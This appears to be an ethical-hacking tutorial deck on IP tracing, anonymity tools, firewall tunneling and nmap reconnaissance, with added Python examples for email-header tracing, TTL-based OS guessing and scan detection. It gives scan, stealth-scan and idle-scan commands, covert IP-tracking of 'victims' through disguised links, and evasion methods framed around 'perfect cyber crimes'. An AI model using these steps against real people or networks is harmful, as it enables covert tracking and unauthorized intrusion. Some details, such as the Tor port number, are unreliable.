
Hacking


Slide 1

Who is a hacker?
A hacker is NOT a criminal. A hacker is somebody who:
- thinks outside the box
- wants to test his limits
- wants to try things that are not in the manual
- has unlimited curiosity
- discovers unknown features about technology
- is dedicated to knowledge
- believes in stretching the limits
- is highly creative

Hackers vs. Crackers
Hackers                    Crackers
Very knowledgeable
Good guy                   Bad guy
Help improve security      Want to cause cyber destruction
Strong ethics              No ethics
Have prior permission      No prior permission

Job opportunities: banking, telecom, IT/ITeS/BPO/KPOs, ecommerce, military, police, retail industry, etc.
Hacking into a computer is just like breaking into a house.

Steps of a hacker:
1. Identify the victim (information gathering)
2. Find a loophole / network reconnaissance
3. Actual attack/hack/break in
4. Escape without a trace

Identify the victim: anatomy of an IP address
An IP address is something analogous to your mobile phone number. It is something which uniquely identifies your presence on the internet. It is a 32-bit address which is divided into four fields of 8 bits, each containing a number between 1 and 255. By simply studying an IP address, we can easily reveal a lot of information about the network the victim belongs to.

Different classes of IP address
Class   Range                          Network/Host IDs
A       0.0.0.0 to 126.255.255.255     NETWORK.HOST.HOST.HOST
B       128.0.0.0 to 191.255.255.255   NETWORK.NETWORK.HOST.HOST
C       192.0.0.0 to 223.255.255.255   NETWORK.NETWORK.NETWORK.HOST
D       224.0.0.0 to 239.255.255.255   Multicast IP addresses. They are IP addresses set aside for special purposes
E       240.0.0.0 to 255.255.255.255   Not in use

For an address XX.YY.AA.BB, the split into network ID and host ID is:
Class A: network ID XXX, host ID YY.AA.BB
Slide 2

Class B: network ID XXX.YY, host ID AA.BB
Class C: network ID XX.YY.AA, host ID BB

Special IP addresses:
Use                                                  IP address
Local loopback address                               127.0.0.1
Private IP addresses (to be used for computers       Class A network: 10.0.0.0 - 10.255.255.255
inside a private network or LAN)                     Class B network: 172.16.0.0 - 172.31.255.255
                                                     Class C network: 192.168.0.0 - 192.168.255.255

Converting IP addresses into different formats:
Format        IP address
Decimal       171.67.215.200
Binary        10101011.01000011.11010111.11001000
Octal         253.103.327.310
Hexadecimal   00AB.0043.00D7.00C8
Tools: http://www.csgnetwork.com/ipaddconv.html, Windows scientific calculator

Tracking the victim's IP address:
- www.spypig.com - used to find out the IP address of the victim by sending a tracking image to the victim's email id
- http://www.getnotify.com/
- http://didtheyreadit.com/
- http://www.politemail.com/ - commonly used in the corporate world
- http://readnotify.com/ - creates a tracking file like a Word or PDF file

How to trace an email back to its sender?
1st technique:
Step 1: Open the email headers ("Show original" option in Gmail; in Yahoo, Email settings -> Full headers).
Step 2: Analyze the email headers manually (the headers contain the IP address) or automatically (2nd technique).
2nd technique: using emailtrackerpro (http://www.emailtrackerpro.com/)
3rd technique: http://blasze.com/iplog/ - simply send a crafted link to your friend. Now we have an ORIGINAL URL and a VICTIM URL. DISGUISED URL: using URL shortening websites such as www.bit.ly and www.goo.gl.
4th technique: www.whatismyipaddress.com
How to find out the victim's IP address using a website?
Step 1: Create your own website/webpage/blog.
Step 2: In the homepage, write Java code to extract the IP address and MAC address of the victim.
Step 3: Invite the victim(s).
5th technique: Using chatting software (not a reliable technique though). Set up a chat with the victim and type the command below at the DOS prompt:
netstat -n
6th technique: TCPView software http://technet.microsoft.com/en-us/sysinternals/bb897437.aspx and CurrPorts http://www.nirsoft.net/utils/cports.html
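The header-analysis technique above (1st technique, step 2), worked through as an added example that is not part of the slide deck: it parses the Received: chain of a constructed sample message, returns the earliest routable client address, skips the private LAN ranges from the table above, and separately reports the earliest address recorded by a server you control, since hops below your own boundary can be forged by the sender. Every host name and address in the sample is made up.

```python
"""Tracing an email toward its origin from its Received: headers.

Added example, not from the slide deck. Each relay prepends one Received:
header, so reading them bottom-up walks the path the message took. The
message below is constructed sample data; all hosts and addresses are made up.
"""
import email
import ipaddress
import re
from email import policy

# Constructed sample: newest header first, as a mailbox shows it. The "\t"
# continuation lines are normal header folding.
SAMPLE_RAW_MESSAGE = """\
Received: from mx2.example-receiver.test (mx2.example-receiver.test [198.51.100.20])
\tby inbox.example-receiver.test with ESMTP id abc123
\tfor <victim@example-receiver.test>; Mon, 3 Jun 2013 10:02:11 +0000
Received: from smtp-out.example-sender.test (smtp-out.example-sender.test [203.0.113.5])
\tby mx2.example-receiver.test with ESMTPS id def456
\tfor <victim@example-receiver.test>; Mon, 3 Jun 2013 10:02:10 +0000
Received: from [192.0.2.77] (unknown [192.0.2.77])
\tby smtp-out.example-sender.test with ESMTPSA id ghi789;
\tMon, 3 Jun 2013 10:02:08 +0000
From: someone@example-sender.test
To: victim@example-receiver.test
Subject: hello

body text
"""

# The deck's private ranges (slide 2) plus loopback: such an address says
# nothing about where on the internet a message came from, so it is skipped.
LAN_RANGES = [ipaddress.ip_network(n) for n in
              ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8")]
BRACKETED_IP = re.compile(r"\[(\d{1,3}(?:\.\d{1,3}){3})\]")


def unfold(value):
    """Join folded continuation lines of one header into a single line."""
    return re.sub(r"\r?\n[ \t]+", " ", value).strip()


def is_lan_address(ip_text):
    addr = ipaddress.ip_address(ip_text)
    return any(addr in net for net in LAN_RANGES)


def parse_received_chain(raw_message):
    """Received hops in delivery order (oldest first) as dicts."""
    msg = email.message_from_string(raw_message, policy=policy.compat32)
    hops = []
    for value in msg.get_all("Received", []):
        line = unfold(value)
        m_from = re.search(r"\bfrom\s+(\S+)(?:\s*\(([^)]*)\))?", line)
        m_by = re.search(r"\bby\s+(\S+)", line)
        from_host = m_from.group(1) if m_from else None
        comment = (m_from.group(2) or "") if m_from else ""
        # Prefer the address the receiving server recorded in parentheses;
        # fall back to a bracketed literal in the 'from' token itself.
        m_ip = BRACKETED_IP.search(comment) or BRACKETED_IP.search(from_host or "")
        hops.append({
            "from_host": from_host,
            "from_ip": m_ip.group(1) if m_ip else None,
            "by_host": m_by.group(1).rstrip(";") if m_by else None,
        })
    hops.reverse()  # mailbox order is newest first; we want the path taken
    return hops


def origin_ip(raw_message):
    """Earliest routable client address in the chain, or None.
    Trusts every Received header, including ones the sender could forge."""
    for hop in parse_received_chain(raw_message):
        if hop["from_ip"] and not is_lan_address(hop["from_ip"]):
            return hop["from_ip"]
    return None


def first_trusted_client_ip(raw_message, own_hosts):
    """Client address recorded by the first server you operate: the earliest
    hop the sender cannot have forged."""
    for hop in parse_received_chain(raw_message):
        if hop["by_host"] in own_hosts:
            return hop["from_ip"]
    return None


# Variant in which the sender submitted the mail from a LAN address.
SAMPLE_LAN_ORIGIN = SAMPLE_RAW_MESSAGE.replace("192.0.2.77", "10.0.0.5")

if __name__ == "__main__":
    for hop in parse_received_chain(SAMPLE_RAW_MESSAGE):
        print(hop)
    print("origin:", origin_ip(SAMPLE_RAW_MESSAGE))
    print("origin (LAN variant):", origin_ip(SAMPLE_LAN_ORIGIN))
    print("first trusted:", first_trusted_client_ip(
        SAMPLE_RAW_MESSAGE, {"mx2.example-receiver.test", "inbox.example-receiver.test"}))
```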
Slide 3

How to trace an IP address to its exact geographical location?
- VisualRoute http://visualroute.visualware.com/
- NeoTrace Pro http://neotrace-pro.en.softonic.com/
- 3d Traceroute http://www.d3tr.de/
- LoriotPro http://www.loriotpro.com/
- GeoSpider http://oreware.com/viewprogram.php?prog=22
- http://vtrace.pl/
All are online versions of the simple traceroute command. Ex: tracert www.indiatimes.com

Trace a mobile phone number to its geographical location: http://trace.bharatiyamobile.com/
Tracking a stolen smartphone: https://www.lookout.com/ - create a Lookout account and register your device.

Summary
- What to do to be a hacker
- What is an IP address
- How to get somebody's IP address
- How to trace the IP address's exact geographic location
- How to track a mobile phone
- How to trace a lost smartphone

Internal and external IP addresses
Introduction to NAT (Network Address Translation)
When the internet was initially created, there was no shortage of IP addresses. However, as internet usage spread, an acute shortage of IP addresses was created worldwide. This led to the emergence of Network Address Translation.
Advantages of NAT: it reduces the need for IP addresses, improves security, and makes implementation of networks easier.
In a NAT system, nobody from the outside world will know the IP address of an internal system.
- Identity is protected
- No direct connection
Slide 4

In a NAT-enabled system, a person from outside first has to hack into the router before trying to get into the internal system. Depending upon the extension number entered, the lookup table is used to route the call to the appropriate internal system.

How to find out the internal IP address and external IP address?
The internal IP address can be found using:
netstat -n
ipconfig /all
The external IP address can be found on http://whatismyipaddress.com/

How to hide your IP address? By using a proxy server.
- http://www.anonymizer.ru - online tool/web proxy. Most of the Russian proxy websites are free. None of them maintain any record or log files.
- http://samair.ru/proxy/
- http://www.hidemyass.com/ - uses URL encoding so that "facebook" does not appear in the URL.

Torrents: how are torrents blocked?
- Disabling torrent clients. Solution: http://www.bitlet.org/
- Blocking download of .torrent extension files. Solution: http://www.torrent2exe.com/ and http://txtor.dwerg.net/

The perfect cyber crimes are committed by effectively hiding your presence on the internet. Your presence on the internet can be spoofed or tricked by hiding your IP address as well as by hiding your system's MAC address, plus with a lethal technique called war driving.

Difference between IP address and MAC address
IP address:
- Given by the ISP/network.
- 2 types: static IP address and dynamic IP address.
- DOS command to get your internal IP address: ipconfig /all
- To get your external IP address, open your web browser and go to http://whatismyipaddress.com/
MAC address:
- Given by the manufacturer, and it is static.
- Your hardware Network Interface Card (NIC), like an ethernet card, wifi card, bluetooth, etc., has its own unique MAC address.
- DOS command to get their respective MAC addresses: getmac

The perfect cyber crimes are committed by:
- Proxy bouncing - IP hiding or IP spoofing (Ultrasoft)
- MAC spoofing - (MACAddressChanger, MacMakeUp - doesn't work on Windows XP, MadMacs, EtherChange, BWmachak)
- War driving - driving on the streets with a laptop and scanning for unprotected wifi networks (inSSIDer, NetStumbler, Kismet, AirSnort and war chalking)
- Onion routing protocol - provides anonymous, secure, encrypted access to the internet. Ex: TOR
Slide 5

How is TOR better than proxy servers?
TOR is available as a free download from http://www.torproject.org.in/
How to unblock TOR?
- Change the name of the downloaded TOR exe file.
- In TOR's proxy settings, change the default port number.
- Add bridge relay server URLs to TOR from https://bridges.torproject.org/
Bridge relays (or "bridges" for short) are Tor relays that aren't listed in the main directory. Since there is no complete public list of them, even if your ISP is filtering connections to all the known Tor relays, they probably won't be able to block all the bridges.
In case https://bridges.torproject.org/ is blocked, another way to find public bridge addresses is to send mail to bridges@torproject.org with the line "get bridges" by itself in the body of the mail. However, so we can make it harder for an attacker to learn lots of bridge addresses, you must send this request from an email address at one of the following domains: gmail.com, yahoo.com.

Types of proxy servers - SOCKS and HTTP
HTTP proxy servers allow you to bypass filtering mechanisms and access blocked content. The user sends an HTTP request to the proxy server, which then reads the Host header in the HTTP request, connects to the target server and transmits back whatever data the server sends back. Usually it works only with HTTP apps. Ex: anonymizer.com
SOCKS proxy servers allow you to bypass filtering mechanisms and access blocked content. SOCKS is a protocol that transmits data between source and destination via a proxy server without reading any of the contents. Hence it works with all protocols like TCP, UDP, etc., and will allow you to use all applications (like mail, browsing, downloading files, etc.). Ex: TOR
TOR works on port number 9051.
Using TOR, you can hide yourself in Skype or any other instant messenger. There are 2 ways to do this:
- Connect the application to TOR
- Connect the application to a proxy
Slide 6

Both cases require an IP address and a port number. Go to Skype -> Tools -> Options -> Connection settings -> Proxy. Give the proxy IP as 127.0.0.1 and port number 9051.

Tools:
- Multiproxy (http://multiproxy.org/multiproxy.htm) - allows you to keep proxies all in the same session. It supports both HTTP and SOCKS. You just need to feed this software with the proxy servers.
- SocksChain http://ufasoft.com/socks/ - connects you to a chain of SOCKS or HTTP proxies (proxy bond).
- ProxyFire http://www.proxyfire.net/
- Ultrasurf https://ultrasurf.us/ - anonymous browsing from your pendrive. It encrypts the connection, hides your IP and unblocks stuff. You can even configure a proxy inside Ultrasurf if your college/organization requires a proxy server to connect to.

Virtual Private Network (VPN)
A VPN is a group of computers connected privately through a public network like the Internet. Usually VPN services give you an encrypted, secure and anonymous communication channel. Popular VPN services are: HideMyAss, IPVanish, StrongVPN, BoxVPN, 12VPN and GoTrusted.
A VPN is like a proxy but in a private network. If Ultrasurf/SOCKS or proxy services don't work as expected, a VPN service is used. VPN servers, like proxy servers, can be in different parts of the world. These servers provide better speed than proxy servers. VPNs are used to access blocked videos on the Internet. Ex: http://www.hidemyass.com/vpn/

HTTP tunneling
Assume that inside your network, FTP and some websites/torrents are blocked by your firewall. But no firewall blocks all traffic. HTTP tunneling disguises blocked sites as regular/allowed HTTP traffic. Let us assume that in your college/company, the FTP protocol (port 21) is blocked or torrents are blocked. The firewall only allows HTTP traffic on port 80; all other ports are blocked. It is possible to encapsulate FTP or torrent traffic inside the HTTP protocol and bypass the firewall.
Step 1: Install the HTTP tunneling software server on your home or outside computer that has unrestricted access.
Step 2: Install the HTTP tunneling software client on your college/office computer that has restricted access.
Step 3: Now your connection diagram is as follows:
YOU -> FTP or torrent software -> HTTP tunneling client (sends FTP or torrent traffic encapsulated in the HTTP protocol via port 80 to bypass the firewall) -> HTTP tunneling server on the home computer -> FTP or torrent destination
Slide 7

Now you can use the college computer to access everything on your home network, including unrestricted internet. Ex: Tunnelizer, HTTPort and HTTPTunnel are good HTTP tunneling tools. Super Network Tunnel (http://www.networktunnel.net/) is a commercial tool to perform 2-way HTTP tunneling between the home network and the college network.

Some cool stuff:
- PSIPHON (http://psiphon.ca/)
- Proxy Workbench (http://proxyworkbench.com/)
- Reverse text: http://www.textmechanic.com/
- Upside down text (http://www.upsidedowntext.com/)

People hacking:
Whatever we do online is tracked in some website.
- http://www.pipl.com/
- http://www.spokeo.com/
- http://www.anywho.com/
- http://www.intelius.com/
- Google Maps street view
- Google Earth satellite view

Network reconnaissance and information gathering (2nd step to hacking)
Network reconnaissance is the process of finding out as much information about the victim as possible. Typically an attacker is trying to find out the following about the victim:
- Victim is online/offline
- Network topography
- DNS information
- List of open ports
- Names and versions of software running on open ports
- OS details
- Possible security loopholes
Techniques: PING sweeping, traceroute, DNS-related tools, LAN surveyors, port scanning, daemon banner grabbing, OS fingerprinting, security auditing
Slide 8

How to execute the attack
Ping sweeping
Ping is used to check the connectivity between your computer and the remote computer (whether you are online, whether the victim is online and whether there is connectivity between both of you). Ping is used for Denial of Service (DoS) attacks, OS and firewall detection purposes.
Popular sweeping tools are nmap (http://nmap.org/) and http://ping.eu/
Ping using Nmap:
nmap -sn -v www.google.com
(-sn means no port scan)
Ping by bypassing the firewall:
nmap -sn -v -Pn www.google.com
Instead of using ICMP echo requests, it connects to port 80.
-sn = perform ping. -v = verbose mode (gives you detailed information about what it is doing).
ICMP echo requests/replies can easily be blocked by a firewall. Hence, the -Pn option attempts to connect to the website or port 80 of www.google.com.
Ping sweeping allows you to ping an entire range of computers:
nmap -sn -v 203.94.1.0-255
Angry IP Scanner - ping sweeping tool

Traceroute
When data packets travel from the source to the destination system, they do not always take the same path. Traceroute is a tool that allows you to trace a path between two systems. Originally it was designed for network troubleshooting but it is commonly used for:
- OS detection
- Firewall detection
- Network topology information
- Geographical location of the target system

How to guess the operating system running on a remote computer by simply using PING and TRACEROUTE?
Time to live (TTL) is a mechanism that limits the lifespan or lifetime of data in a computer or network. The TTL value gets reduced by one every time a data packet reaches a router. The initial TTL value is determined by the operating system. If I am able to find out the initial TTL value of a data packet sent by the victim, I can guess the operating system running on the victim. Different operating systems have different TTL values.
Final TTL value = Initial TTL value - No. of routers

Steps to know what OS www.altoromutual.com is running (it is legal to hack this URL):
Step 1:
E:\Documents and Settings\SYS>ping www.altoromutual.com
Pinging altoromutual.com [65.61.137.117] with 32 bytes of data:
Reply from 65.61.137.117: bytes=32 time=290ms TTL=117
Reply from 65.61.137.117: bytes=32 time=290ms TTL=117
Reply from 65.61.137.117: bytes=32 time=289ms TTL=117
Reply from 65.61.137.117: bytes=32 time=290ms TTL=117
Slide 9

Ping statistics for 65.61.137.117:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 289ms, Maximum = 290ms, Average = 289ms
Inference: Final TTL value = 117
117 = Initial TTL value - No. of router hops
Step 2:
E:\Documents and Settings\SYS>tracert www.altoromutual.com
Tracing route to altoromutual.com [65.61.137.117]
over a maximum of 30 hops:
  1    <1 ms    <1 ms    <1 ms  192.168.1.1
  2    22 ms    23 ms    25 ms  ABTS-KK-Static-001.228.178.122.airtelbroadband.in [122.178.228.1]
  3    20 ms    21 ms    21 ms  ABTS-KK-Static-217.32.166.122.airtelbroadband.in [122.166.32.217]
  4    20 ms    21 ms    21 ms  AES-Static-025.102.22.125.airtel.in [125.22.102.25]
  5   185 ms   178 ms   176 ms  125.62.187.189
  6   177 ms   178 ms   178 ms  ldn-b2-link.telia.net [213.248.71.17]
  7   177 ms   178 ms   178 ms  ldn-bb2-link.telia.net [80.91.247.26]
  8   290 ms   291 ms   291 ms  nyk-bb2-link.telia.net [80.91.248.254]
  9     *        *        *     Request timed out.
 10     *      290 ms   288 ms  rackspace-ic-127247-dls-bb1.c.telia.net [213.248.88.174]
 11   290 ms   289 ms   291 ms  coreb.dfw1.rackspace.net [74.205.108.52]
 12   291 ms   291 ms   291 ms  core5.dfw1.rackspace.net [74.205.108.27]
 13   290 ms   294 ms   289 ms  67.192.56.19
 14   291 ms   289 ms   289 ms  65.61.137.117
Trace complete.
E:\Documents and Settings\SYS>
Inference: Count the number of hops. Eliminate the 1st entry (which is the source) and the last entry (which is the destination), and do not count request timeouts. That gives 11 router hops.
Final TTL value = 117
No. of router hops = 11
117 = Initial TTL value - 11
Initial TTL value = 128
Step 3: Now Google search for the default TTL values of different operating systems. From the URL http://www.binbert.com/blog/2009/12/default-time-to-live-ttl-values/, a TTL value of 128 corresponds to some Windows-based operating system running on the victim (www.altoromutual.com).

Domain Name Server
A DNS lookup is a query sent by a user (browser, IM or email client) to a DNS server to convert a particular domain name to its respective IP address.
- www.whois.net
- www.iptools.com
- www.betterwhois.com
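The TTL arithmetic of slides 8 and 9, carried out in code as an added example that is not part of the slide deck: it parses the ping and tracert output shown above (embedded here as constructed sample input), applies the slide's hop-counting rule and reconstructs the initial TTL. The default-TTL table (64, 128, 255) is an assumption of this example, not the page's reference list.

```python
"""Initial-TTL reconstruction from ping + tracert output (slides 8-9).

Added example, not from the slide deck. The inputs are the deck's own
command output, embedded as constructed sample input so the script runs
offline. DEFAULT_TTLS is an assumption: the commonly seen defaults 64
(Linux/Unix), 128 (Windows) and 255 (network gear), nothing more precise.
"""
import re
from collections import Counter

PING_OUTPUT = """\
Pinging altoromutual.com [65.61.137.117] with 32 bytes of data:
Reply from 65.61.137.117: bytes=32 time=290ms TTL=117
Reply from 65.61.137.117: bytes=32 time=290ms TTL=117
Reply from 65.61.137.117: bytes=32 time=289ms TTL=117
Reply from 65.61.137.117: bytes=32 time=290ms TTL=117
"""

TRACERT_OUTPUT = """\
Tracing route to altoromutual.com [65.61.137.117]
over a maximum of 30 hops:
  1    <1 ms    <1 ms    <1 ms  192.168.1.1
  2    22 ms    23 ms    25 ms  ABTS-KK-Static-001.228.178.122.airtelbroadband.in [122.178.228.1]
  3    20 ms    21 ms    21 ms  ABTS-KK-Static-217.32.166.122.airtelbroadband.in [122.166.32.217]
  4    20 ms    21 ms    21 ms  AES-Static-025.102.22.125.airtel.in [125.22.102.25]
  5   185 ms   178 ms   176 ms  125.62.187.189
  6   177 ms   178 ms   178 ms  ldn-b2-link.telia.net [213.248.71.17]
  7   177 ms   178 ms   178 ms  ldn-bb2-link.telia.net [80.91.247.26]
  8   290 ms   291 ms   291 ms  nyk-bb2-link.telia.net [80.91.248.254]
  9     *        *        *     Request timed out.
 10     *      290 ms   288 ms  rackspace-ic-127247-dls-bb1.c.telia.net [213.248.88.174]
 11   290 ms   289 ms   291 ms  coreb.dfw1.rackspace.net [74.205.108.52]
 12   291 ms   291 ms   291 ms  core5.dfw1.rackspace.net [74.205.108.27]
 13   290 ms   294 ms   289 ms  67.192.56.19
 14   291 ms   289 ms   289 ms  65.61.137.117
Trace complete.
"""

# Assumed common defaults; the smallest default at or above the
# reconstructed initial TTL is taken as the match.
DEFAULT_TTLS = ((64, "Linux/Unix"), (128, "Windows"), (255, "Network device/Solaris"))

HOP_LINE = re.compile(r"^\s*(\d+)\s+(.*\S)\s*$")


def final_ttl_from_ping(ping_text):
    """Most common TTL in the echo replies: the slide's 'final TTL value'."""
    ttls = [int(t) for t in re.findall(r"TTL=(\d+)", ping_text)]
    if not ttls:
        raise ValueError("no TTL values found in ping output")
    return Counter(ttls).most_common(1)[0][0]


def router_hops_from_tracert(tracert_text):
    """The slide's counting rule: drop the first entry (source side), the
    last entry (destination) and every 'Request timed out' entry."""
    entries = [m.group(2) for m in map(HOP_LINE.match, tracert_text.splitlines()) if m]
    if len(entries) < 2:
        raise ValueError("tracert output has fewer than two hop entries")
    middle = entries[1:-1]
    return sum(1 for e in middle if "Request timed out" not in e)


def initial_ttl(final_ttl, router_hops):
    """Final TTL = initial TTL - number of routers, rearranged."""
    return final_ttl + router_hops


def os_family_for_ttl(ttl):
    """(matched default, family) for the nearest default at or above ttl."""
    for default, family in DEFAULT_TTLS:
        if ttl <= default:
            return default, family
    return None, "unknown"


def infer_os(ping_text, tracert_text):
    """Run the whole slide procedure and return every intermediate value.
    A host whose admin changed the OS default TTL (the countermeasure on
    slide 14) lands on a different row of DEFAULT_TTLS, which is the point."""
    final = final_ttl_from_ping(ping_text)
    hops = router_hops_from_tracert(tracert_text)
    init = initial_ttl(final, hops)
    default, family = os_family_for_ttl(init)
    return {"final_ttl": final, "router_hops": hops, "initial_ttl": init,
            "matched_default": default, "os_family": family}


if __name__ == "__main__":
    print(infer_os(PING_OUTPUT, TRACERT_OUTPUT))
```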
Slide 10

- www.dnsstuff.com
- www.dnstools.com
- www.zoneedit.com/lookup.html

Port scanning
Port scanning is the art of scanning a remote target system to obtain a list of open virtual ports on it that are listening for connections. This is usually one of the first few steps every criminal takes. Popular port scanning tools: nmap, strobe, superscan, etc. It allows a criminal to identify any potential entry points into a target computer. The following covers how to see open ports on some remote computer.
Popular ports:
21   FTP
23   Telnet
25   SMTP
53   DNS
80   HTTP
110  POP3
443  SSL/https
513  rlogin

TCP packet format - flag types:
SYN = start a new connection
FIN = end an existing connection
RST = error notification
ACK = data received successfully

How are connections established on the Internet?
3-step / 3-way TCP/IP handshake (=====> means "sends"):
Step 1: Client (me) =====> SYN packet =====> Host (Google)
Step 2: Host =====> SYN/ACK packet =====> Client
Step 3: Client =====> ACK packet =====> Host
How are connections terminated? 2 steps:

Slide 11

Step 1: Client =====> FIN packet =====> Host
Step 2: Host =====> ACK packet =====> Client
(The reverse also needs to happen.)
It is possible to create your own packets using Colasoft Packet Builder (packet generator) and Komodia Packet Crafter, which are available as free downloads on the internet.

TCP CONNECT port scan / TCP handshake port scan
This port scan establishes a full 3-way TCP/IP handshake with all ports on the remote system.
Procedure:
ATTACKER sends a SYN packet to TARGET
OPEN: TARGET sends back a SYN/ACK packet
CLOSED: TARGET sends back a RST/ACK packet
ATTACKER sends an ACK/RST packet back to TARGET
Advantages: very accurate, no countermeasures
Disadvantages: attacker is easily detected/caught
Nmap command:
nmap -sT -p 1-100 -Pn www.altoromutual.com
-sT  TCP connect port scan
-p   port range

The second type of scan, where detection is difficult, is:
1) TCP SYN port scan / half-open scan / stealth scan
Also known as a half-open scan because only half of the complete 3-way TCP/IP handshake is executed.
ATTACKER sends a SYN packet to TARGET
OPEN: TARGET sends back a SYN/ACK packet
No third step (unlike the previous scan). Considered stealth. Can be detected using PortSentry on the Unix platform (http://sourceforge.net/projects/sentrytools/).
nmap -sS -p 1-100 -Pn www.altoromutual.com
NULL/XMAS port scan - stealth but unreliable, with varied responses
nmap -sX -p 1-100 www.altoromutual.com (all flags set to 1)
nmap -sN -p 1-100 www.altoromutual.com (all flags set to 0)

2) IDLE port scan (blind port scanning)
Very useful for the attacker. It port scans the victim without sending even a single packet to the victim from its own IP address. Every system has a fragment ID number, which is a 4-digit number that is increased by 1 each time a packet is sent by it.
Step 1: Probe a zombie machine for its fragment ID.
ATTACKER =====> sends SYN/ACK packet =====> ZOMBIE
ZOMBIE =====> sends back a RST packet with fragment ID =====> ATTACKER
Assume the recorded fragment ID = 1012.
Step 2: Send a spoofed SYN packet from the zombie to the victim.
OPEN: Victim sends SYN/ACK to Zombie. Zombie sends back a RST and increases its fragment ID by 1, so it becomes 1013.
CLOSED: Victim sends RST to Zombie, who discards the RST packet and does not change its fragment ID.
Slide 12

Step 3: Probe the fragment ID of the Zombie again. If the fragment ID increased by 1, then the port on the victim is open, else it is closed.
nmap -Pn -p 1-100 -sI <ZOMBIE/friend's IP address> www.altoromutual.com
-sI = idle port scan

3) ACK port scan / firewall detection scan
nmap -sA -Pn -p 1-100 www.altoromutual.com
This type of scan can be used to determine the presence of a firewall filtering out data packets.
ATTACKER sends an ACK packet to TARGET
FIREWALL PRESENT: no response
FIREWALL NOT PRESENT: TARGET sends back a RST packet.
Other command line port scanning tools: scanline, hping3, etc.

Countermeasures:
- Foolproof countermeasures against port scanning do not exist.
- Close as many ports as possible.
- Filter out certain packets using firewalls, ACLs and other filters, using tools like Scanlogd, BlackICE, Abacus, PortSentry, Snort, etc.

Daemon banner grabbing
It helps you confirm your guess about the victim's operating system. Once you get to know the list of installed software on the victim system, the attacker Google searches for vulnerabilities in the installed software.
Daemon banner grabbing is the process of getting useful information about the target system by recording the welcome banners of the daemons running on various ports. It can be used to get the following information about the target system:
- Daemon name and version number
- OS information
- Most important, to identify possible points of entry
nmap -sV -p 1-100 www.altoromutual.com
Scanline: sl -v -bt 1-100 www.altoromutual.com
Manual technique using PuTTY (Telnet client): Telnet to port 80 of the victim. The "Close window on exit" option should be set to "Never". Type HEAD / HTTP/1.0 and press Enter. You will get the victim's daemon banner as output.
HTTPRecon http://www.computec.ch/projekte/httprecon/
Countermeasures:
- Edit the default daemon message, ensuring critical information is not revealed.
- Misguide the attacker by displaying false daemon banners.
- Use a long false daemon banner and, in the background, record information about the attacking client and try to trace him/her.
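The port-scan countermeasures above name Scanlogd, PortSentry and Snort. This added example (not from the slide deck, and not those tools' own logic) shows the core rule such detectors apply, run over constructed log lines in a made-up one-record-per-packet format: a single source touching many distinct ports on one host within a short window is a connect or half-open sweep (both begin with SYN), and the NULL and XMAS flag combinations from slide 11 are flagged on sight because no legitimate connection opener sends them.

```python
"""Port-scan detection over connection-attempt records (slides 11-12).

Added example, not from the slide deck. SAMPLE_LOG is constructed and uses
a made-up format:  <ISO time> SRC=<ip> DST=<ip> DPT=<port> FLAGS=<letters>
where S=SYN, A=ACK, F=FIN, P=PSH, U=URG, R=RST and an empty FLAGS value
means no flag was set (a NULL probe). All addresses are documentation ranges.
"""
import re
from collections import defaultdict, deque
from datetime import datetime

SAMPLE_LOG = """\
2013-06-03T10:00:00 SRC=198.51.100.7 DST=192.168.1.10 DPT=80 FLAGS=S
2013-06-03T10:00:00 SRC=203.0.113.9 DST=192.168.1.10 DPT=21 FLAGS=S
2013-06-03T10:00:00 SRC=203.0.113.9 DST=192.168.1.10 DPT=22 FLAGS=S
2013-06-03T10:00:01 SRC=203.0.113.9 DST=192.168.1.10 DPT=23 FLAGS=S
2013-06-03T10:00:01 SRC=198.51.100.7 DST=192.168.1.10 DPT=80 FLAGS=S
2013-06-03T10:00:01 SRC=203.0.113.9 DST=192.168.1.10 DPT=25 FLAGS=S
2013-06-03T10:00:02 SRC=203.0.113.9 DST=192.168.1.10 DPT=53 FLAGS=S
2013-06-03T10:00:02 SRC=203.0.113.9 DST=192.168.1.10 DPT=80 FLAGS=S
2013-06-03T10:00:05 SRC=198.51.100.7 DST=192.168.1.10 DPT=443 FLAGS=S
2013-06-03T10:00:07 SRC=203.0.113.44 DST=192.168.1.10 DPT=22 FLAGS=FPU
2013-06-03T10:00:08 SRC=203.0.113.44 DST=192.168.1.10 DPT=22 FLAGS=
"""

LINE_RE = re.compile(r"^(\S+) SRC=(\S+) DST=(\S+) DPT=(\d+) FLAGS=(\S*)$")


def parse_line(line):
    m = LINE_RE.match(line.strip())
    if not m:
        raise ValueError(f"unparseable log line: {line!r}")
    ts, src, dst, port, flags = m.groups()
    return {"ts": datetime.fromisoformat(ts), "src": src, "dst": dst,
            "port": int(port), "flags": set(flags)}


def classify_probe(flags):
    """Flag combinations that are probes by construction (slide 11)."""
    if not flags:
        return "null-scan"
    if {"F", "P", "U"} <= flags and not flags & {"S", "A"}:
        return "xmas-scan"
    return None


def detect_scans(log_text, window_seconds=10, port_threshold=5):
    """Return (kind, src, dst, detail) alerts for the whole log."""
    events = [parse_line(l) for l in log_text.splitlines() if l.strip()]
    alerts = []

    # 1. A single malformed probe is an alert on its own.
    for e in events:
        kind = classify_probe(e["flags"])
        if kind:
            alerts.append((kind, e["src"], e["dst"], e["port"]))

    # 2. Sweep detection: distinct destination ports per (src, dst) inside a
    #    sliding time window. Connect and half-open scans both start with SYN,
    #    so the rule covers -sT and -sS alike; repeated hits on one port
    #    (a normal client reconnecting) never raise the count.
    per_pair = defaultdict(list)
    for e in events:
        if "S" in e["flags"]:
            per_pair[(e["src"], e["dst"])].append((e["ts"], e["port"]))
    already_reported = set()
    for (src, dst), hits in per_pair.items():
        hits.sort()
        window = deque()
        for ts, port in hits:
            window.append((ts, port))
            while (ts - window[0][0]).total_seconds() > window_seconds:
                window.popleft()
            distinct = {p for _, p in window}
            if len(distinct) >= port_threshold and (src, dst) not in already_reported:
                already_reported.add((src, dst))
                alerts.append(("syn-sweep", src, dst, len(distinct)))
    return alerts


def flagged_sources(log_text):
    """Sorted list of source addresses with at least one alert."""
    return sorted({a[1] for a in detect_scans(log_text)})


if __name__ == "__main__":
    for alert in detect_scans(SAMPLE_LOG):
        print(alert)
```

A vulnerability scanner you run yourself trips the same rule, so an allow-list of known scanner sources belongs in front of it in production.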
Slide 13

NetCat
Netcat is one of the most popular and widely used networking utilities on the internet. It can be used to read and write network connections. It is widely used by both criminals and system administrators.
Netcat is used for:
- Listening on a port
- Connecting to a port
- File transfer
- Chatting
- Executing applications
